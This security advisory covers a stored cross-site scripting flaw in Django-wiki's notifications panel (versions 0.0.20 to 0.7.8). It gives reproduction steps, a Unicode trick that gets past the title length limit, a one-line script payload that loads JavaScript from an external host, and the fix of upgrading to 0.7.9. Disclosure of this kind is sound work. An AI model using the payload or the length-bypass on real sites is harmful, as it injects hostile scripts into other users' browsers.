Overview
In Django-wiki, versions 0.0.20 to 0.7.8 are vulnerable to Stored Cross-Site Scripting (XSS) in Notifications Section. An attacker who has access to edit pages can inject JavaScript payload in the title field. When a victim gets a notification regarding the changes made in the application, the payload in the notification panel renders and loads external JavaScript.
Details
Django-wiki application is vulnerable to Stored Cross-Site Scripting (XSS) in Notifications Section. An attacker who has access to edit pages can inject JavaScript payload in the title field. When a victim gets a notification regarding the changes made in the application, the payload in the notification panel renders and loads external JavaScript.
PoC Details
Login into the application as a non-admin user and select any page (test page) that has edit permissions. Now, insert the JavaScript payload (found below) into the title parameter. Login in another browser as an admin and observe the notification bar on the top. When the victim receives a notification update, the payload gets triggered and loads the external JavaScript into the application. The JavaScript payload used was less than 25 characters because the length of the title parameter will be truncated if it is more than 25 as written in code. And also, a unicode character “℡” which is considered as a single character by application but renders as three characters “TEL” by browser because of Unicode compatibility is used to create a domain name with a minimum length of 3 characters. Content of the file “a.js” hosted on the attacker's server.
PoC Code
<script src=//℡z.in/a.js>
Affected Environments
0.0.20 to 0.7.8
Prevention
Upgrade to version 0.7.9 or later